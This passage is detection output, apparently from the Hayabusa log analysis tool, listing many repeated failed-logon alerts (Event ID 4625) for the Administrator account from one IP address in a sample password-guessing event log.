Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
